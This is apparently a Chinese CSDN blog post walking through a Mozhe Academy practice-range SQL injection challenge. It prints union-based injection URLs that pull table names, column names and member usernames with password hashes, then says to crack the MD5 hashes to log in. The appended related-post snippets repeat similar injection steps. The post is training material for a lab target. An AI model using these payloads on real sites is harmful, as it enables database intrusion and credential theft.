[墨者学院]SQL手工注入漏洞测试(MySQL数据库)

最新推荐文章于 2024-10-02 12:42:27 发布

方聚

最新推荐文章于 2024-10-02 12:42:27 发布

阅读量2.4k

点赞数

分类专栏：靶场文章标签： mysql 数据库 sql

本文链接：https://blog.csdn.net/moRickyer/article/details/122474470

版权

靶场专栏收录该内容

1 篇文章 0 订阅

订阅专栏

在这里插入图片描述
必知知识：
数据库版本：version()
数据库名：database()
数据库用户：user()
操作系统：@@version_compile_os

information_schema.tables：记录所有表名信息的表
information_schema.column：记录所有列名信息的表
table_name：表名
column_name：列名
table_schema：表名
在这里插入图片描述
点击登录下面通知进入

在这里插入图片描述
在网址随便输入判断是否存在注入点

通过输入order by x进行判断字段数
在这里插入图片描述
将前面进行报错执行后面内容，查询输入

得到数据库库名

获取表名

http://219.153.49.228:44553/new_list.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'#

在这里插入图片描述
获取列名：

http://219.153.49.228:44553/new_list.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member'#

在这里插入图片描述
得到数据

http://219.153.49.228:44553/new_list.php?id=-1 union select 1,2,group_concat(name,password),4 from StormGroup_member#

在这里插入图片描述

将得到的代码进行MD5解密登录账户获取flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

方聚

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

墨者SQL手工注入漏洞测试(MySQL数据库)思路

weixin_50847719的博客

01-22

611

师从小迪,刚看完sql注入,印象最深刻就是小迪师傅到第四天了打火机依旧没油,咔嚓咔嚓打不着火进入寻找注入点看这 http://219.153.49.228:47589/new_list.php?id=1 判断注入,老办法and 1 = 1和and 1=2 http://219.153.49.228:47589/new_list.php?id=1%20and%201=2 下面该数据库有几个字段(列名数量) order by x id=1 order by x http://219.153.

墨者学院HTTP头注入漏洞测试(X-Forwarded-for)

qq_43817824的博客

07-24

1245

打开靶场环境，查看网页源代码，发现flag.php是进入墨者的任性首页。设置网页代理，进入墨者的任性网页，打开Burp Suite ，抓包，右键发送给repeater，自己填入X-Forwarded-For，然后判断是否可注入。 3.order by 判断表数量，最后发现是4 4.union select 1,2,3,4测试其注入点的位置是在4，通过union select 1,2,3,(...

参与评论您还未登录，请先登录后发表或查看评论

《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》

weixin_47118413的博客

06-21

2475

背景介绍安全工程师"墨者"最近在练习SQL手工注入漏洞，自己刚搭建好一个靶场环境Nginx+PHP+MySQL，PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

墨者 - SQL手工注入漏洞测试(MySQL数据库)

吃肉唐僧的博客

07-02

749

/new_list.php?id=1 and 1=1，判断id的类型值是数字类型 /new_list.php?id=1 order by 4，测出数据库有4个字段，第5个不回显测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...

墨者学院mysql注入_【墨者学院】：HTTP头注入实战（host注入）

weixin_36176546的博客

01-19

412

0x00.题目描述：背景介绍安全工程师"墨者"最近在练习MySQL头部注入漏洞，自己刚搭建好一个靶场环境PHP+MySQL。尽情的练习SQL注入吧。实训目标1、掌握SQL注入原理；2、了解手工注入的方法3、了解MySQL的数据结构；4、了解HTTP头部注入；解题方向HTTP头部(HOST注入)0x01.解题思路：靶场环境：主界面墨者网页手动检测注入点：测试行数：联合注入，首先测出是具体哪几行会出现...

sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)

m0_75178803的博客

04-15

904

猜解列名字段数（数量） order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来，我们在id=1后面随意输入一些东西。order by 4，页面正常。order by 1，网站正常。order by 5，页面错误。文章基于小迪sql注入的复现。页面错误，说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。

墨者-SQL手工注入漏洞测试(MySQL数据库)

qq_66105152的博客

07-22

156

在地址栏加上语句“and 1=1”，页面可以正常显示。再尝试加入语句“and 1=2”，页面显示出错，没有了相关内容。说明地址栏是一个sql 的一个注入口。可知，数据库mozhe_Discuz_StormGroup下有两个表，一个StormGroup_member，另一个为notice。

墨者学院SQL手工注入漏洞测试(MySQL数据库)

Lakers248_的博客

05-14

536

解题思路+知识点

墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)

Lollipop_zhi的博客

02-26

2283

1.启动靶场环境，老地方点击 2.看地址栏，合理怀疑是否有注入点这里插入知识点——怎么判断有注入点？一般方法： and 1=1 正常 and 1=2 错误背后的原理是逻辑运算真且真=真；真且假=假所以只需要让它能判断出假，就可以合理怀疑存在注入点比如：id=jhfjkashlk（瞎打的）改成 id=jhdak 显示异常，有注入点 3.尝试简单使用order by 猜解列名数量，不成功 order by 之后我才判断了单引号闭合，也就是id=tingjigon

墨者学院-SQL手工注入漏洞测试(MySQL数据库)

weixin_42939822的博客

03-16

3613

墨者学院-SQL手工注入漏洞测试(MySQL数据库)

墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

weixin_46694260的博客

03-27

3978

0x00 前言我们都知道，SQL注入分数字型和字符型，我们上次讲的是最基本的数字型SQL注入，这次我们就来讲最基本的字符型SQL注入。同样，如果是明白原理和方法的话，看懂这篇文章并不难，但是如果不清楚原理和方法的话…还是可以看的，大家多多给我点赞吧，哈哈哈哈哈，还是那句话，菜鸟一个，大佬勿喷~ 0x01 过程首先，还是老样子，我们先看一下题目这里通过题目我们知道，这次SQL注入是字符型的SQL注入那我们就进入靶场环境可以看到和上次一样，有一个登录系统，登录框下面有一个维护新闻轮播框我们点进去

墨者靶场—SQL手工注入漏洞测试(MySQL数据库)

weixin_46694260的博客

03-23

7297

0x00 前言学SQL注入也有一段时间了，找了一个在线靶场，这个题目基本上学会最基本的注入原理和方法都能拿下，废话就不多说了，直接来演示吧~菜鸟渗透，大佬勿喷 0x01 过程首先我们先稍微看一下题目通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...

墨者 - SQL注入漏洞测试(HTTP头注入)

吃肉唐僧的博客

07-07

2548

手动判断注入点判断字段判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database...

墨者学院-SQL注入漏洞测试(HTTP头注入)

JimWu的博客

09-04

1310

SQL注入漏洞测试(HTTP头注入) 难易程度:★★ 题目类型:SQL注入使用工具:FireFox浏览器、burpsuite 1.打开靶场，使用burpsuite访问网页，截包。 2.把包send to repeater，根据题目为host注入，把host改为or 1=1，报错，证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...

MySQL表的增删改查(基础)

最新发布

weixin_63965017的博客

10-02

530

语法表名values(值，值......);值与列相匹配。

【MySQL】MySQL 数据库主从复制详解

人生苦短，睡觉要紧，睡醒再说

10-01

1248

MySQL 主从复制是实现高可用性和负载均衡的重要手段。通过合理配置和监控，可以显著提升数据库的可用性和性能，有效地管理数据同步，实现系统的弹性和鲁棒性。在实际应用中，应根据业务需求和系统架构来合理设计部署方案，并定期监控复制状态，以确保数据的一致性和完整性。了解主从复制的工作原理及其配置过程，对数据库管理员至关重要。希望本文能帮助您深入理解 MySQL 主从复制的相关知识。

【mysql相关总结】

Charles D

09-30

342

数据库小的表,全表扫描效率更高，不用建索引。索引的类型1.普通索引：基本的索引，没有任何约束限制2.唯一索引：类似普通索引,有唯一约束性3.主键索引：特殊的唯一索引,不允许有空值4.组合索引：多个列组合创建索引5.外键索引：只有innodb可以使用6.全文索引：只有myisam可以使用，且只能对英文进行全文检索注意事项1.复合索引遵循前缀原则（最左匹配原则）2.like查询,%号不能在前面，否则索引失效3.如果or前面的条件有索引,也会失效。

Python 3 和 MySQL(PyMySQL) 的完美结合

wjs2024的博客

10-02

620

PyMySQL 是一个纯 Python 编写的 MySQL 客户端库，它提供了与 MySQL 数据库进行交互的接口。PyMySQL 设计轻量、易于安装和使用，且完全兼容 MySQLdb 接口，使得从 MySQLdb 迁移变得非常简单。Python 3 和 PyMySQL 库的结合为开发人员提供了一种高效、简洁的方式来与 MySQL 数据库进行交互。通过本文的介绍，您应该能够理解如何安装 PyMySQL、建立数据库连接、执行 SQL 语句、处理查询结果以及处理可能出现的错误。

docker容器mysql数据备份 mysql容器无法启动备份数据

zhangxu1998lq的博客

09-30

392

mysql是旧容器名因为mysql的配置文件my.cnf的路径没有映射到服务器，我修改了配置文件，配置文件有错误导致，容器启动不了，一直restarting。nmysql是新容器名 mysql是旧容器名 mysql:5.7是我的镜像名。新容器正常启动，旧容器的数据都还在。

墨者-sql手工注入漏洞测试

04-29

墨者安全团队是一支专注于网络安全领域的团队，他们致力于网络安全研究和技术推广。其中，手工注入漏洞测试是他们的一项重要工作之一。在进行手工注入漏洞测试时，墨者安全团队通常会通过一系列的步骤来进行测试。首先，他们会对目标网站进行初步信息收集，包括了解目标网站的架构、数据库类型、应用程序等等。然后，他们会通过手工注入的方式对目标网站进行攻击，以确定是否存在注入漏洞，并尝试获取敏感信息。在手工注入的过程中，墨者安全团队通常会使用一些工具来辅助测试，例如Burp Suite、SQLMap等。同时，他们也会根据目标网站的具体情况进行一些自定义的测试，以提高测试效果。总的来说，墨者安全团队的手工注入漏洞测试方法比较系统和全面，可以有效地发现目标网站中存在的注入漏洞，从而帮助企业提高网络安全防护水平。